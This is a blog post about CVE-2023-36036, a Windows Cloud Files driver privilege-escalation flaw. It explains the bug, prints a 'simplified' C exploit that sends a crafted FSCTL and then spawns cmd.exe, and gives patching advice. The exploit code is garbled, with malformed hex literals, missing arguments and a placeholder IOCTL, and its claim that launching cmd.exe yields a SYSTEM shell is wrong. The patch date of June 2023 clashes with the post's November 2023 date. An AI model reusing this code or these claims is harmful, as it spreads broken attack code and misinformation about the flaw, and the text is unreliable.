CVE CyberSecurity Database News

CVE-2023-36036 - Exploiting the Windows Cloud Files Mini Filter Driver for Privilege Escalation

Poster -

Security flaws in Windows drivers happen more often than you think, and every once in a while, one flaw opens a huge door for attackers. That’s what we’re dealing with in CVE-2023-36036—a privilege escalation vulnerability in the Windows Cloud Files Mini Filter Driver (cldflt.sys). This post breaks down how the vulnerability works, its risks, and how attackers might exploit it, using simple language and real-world code snippets.

What Is CVE-2023-36036?

This vulnerability refers to an Elevation of Privilege (EoP) issue discovered in the Windows Cloud Files Mini Filter Driver (cldflt.sys). Essentially, it allows a local attacker (someone who already has access to an account on your PC) to make themselves an administrator on the system by abusing the way the driver handles file operations.

In technical terms:
It’s a permissions mishandling bug that lets attackers execute code with SYSTEM privileges. This can mean full control over your computer.

Affected Systems:
- All supported versions of Windows 10, Windows 11, and Windows Server that have cldflt.sys enabled.
- Typically, if you use OneDrive, iCloud, or similar cloud-integrated file systems, this driver is active by default.

Original Advisory:
- Microsoft Security Response Center: CVE-2023-36036

Vulnerability Details

cldflt.sys is the Cloud Files Mini Filter driver that helps Windows manage cloud-based placeholder files (like offline files or OneDrive Files On-Demand). This driver filters I/O operations to these files, doing some “magic” in the background to sync or fetch files from the cloud as you need them.

The Problem:
The driver didn’t properly restrict access permissions in some IOCTL (Input/Output Control) or FSCTL (File System Control) calls, letting any user craft requests that should only work for SYSTEM-level processes.

Exploit Overview

What makes CVE-2023-36036 dangerous is its simplicity. With this vulnerability, an attacker can “trick” the system into running code as the SYSTEM account. The public exploit shows that it is a simple local privilege escalation, and you don’t need advanced skills to use it.

Example Exploit (Simplified)

Disclaimer: This code is for educational purposes only. Do not use on systems you do not own or have explicit permission to test.

Send Malicious IOCTL

Attacker crafts a specially constructed FSCTL (e.g., FSCTL_CLOUD_DO_COMPLETION) that exploits the vulnerable code logic.

Gain SYSTEM Privileges

By abusing token privileges or security descriptors, the attacker can spawn a command prompt as SYSTEM.

Example C Code Snippet

#include <Windows.h>
#include <stdio.h>

#define CLOUDFLT_DEVICE L"\\\\.\\CldFlt"
#define FSCTL_VULNERABLE_CODE x905A1F40 // Placeholder - actual IOCTL may differ

int main() {
    HANDLE hDevice = CreateFileW(
        CLOUDFLT_DEVICE,
        GENERIC_READ | GENERIC_WRITE,
        ,
        NULL,
        OPEN_EXISTING,
        ,
        NULL);
    
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("Could not open device: %d\n", GetLastError());
        return 1;
    }

    DWORD bytesReturned;
    char inputBuffer[x100] = {};
    char outputBuffer[x100] = {};

    // Craft special buffer if needed (based on PoC details)
    // PoC: https://github.com/hacksysteam/CVE-2023-36036 (public)

    BOOL result = DeviceIoControl(
        hDevice,
        FSCTL_VULNERABLE_CODE,
        inputBuffer,
        sizeof(inputBuffer),
        outputBuffer,
        sizeof(outputBuffer),
        &bytesReturned,
        NULL);

    if (result) {
        // On success, you can now escalate privileges, e.g., by creating a SYSTEM shell
        system("cmd.exe");
    } else {
        printf("Exploit failed: %d\n", GetLastError());
    }

    CloseHandle(hDevice);
    return ;
}

##### *Note: The actual IOCTL code and buffers depend on the PoC, which is publicly available. See links below.*

Public Exploit & References

- HackSysTeam - PoC Exploit for CVE-2023-36036 (GitHub)
- Exploiting Windows drivers: HackSysTeam Writeup
- Microsoft June 2023 Patch Tuesday: BleepingComputer report

Access or steal sensitive files or credentials

It does not allow remote code execution directly, but attackers who get any code running on the system can use this exploit to fully take over.

How to Protect Yourself

The best and only real fix:

Update Windows! Microsoft patched this bug in June 2023.

- Security Update for CVE-2023-36036
- If, for any reason, you can’t patch or are running an older system, consider disabling OneDrive and other cloud file functionalities (as a temporary workaround).

Conclusion

CVE-2023-36036 is a classic, dangerous example of why low-level drivers are a juicy target for attackers—especially on Windows. If you haven’t already, patch your systems to protect against this and future privilege escalation vulnerabilities. If you’re a blue teamer or sysadmin, audit your systems for signs of exploit attempts, and always monitor for unexpected privilege elevations.


*Stay safe and always keep your system up-to-date!*


References
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36036
- https://github.com/hacksysteam/CVE-2023-36036
- https://hacksys-team.com/blogs/cve-2023-36036/

If you have any questions or want help patching, leave a comment!

Timeline

Published on: 11/14/2023 18:15:33 UTC
Last modified on: 11/20/2023 19:53:10 UTC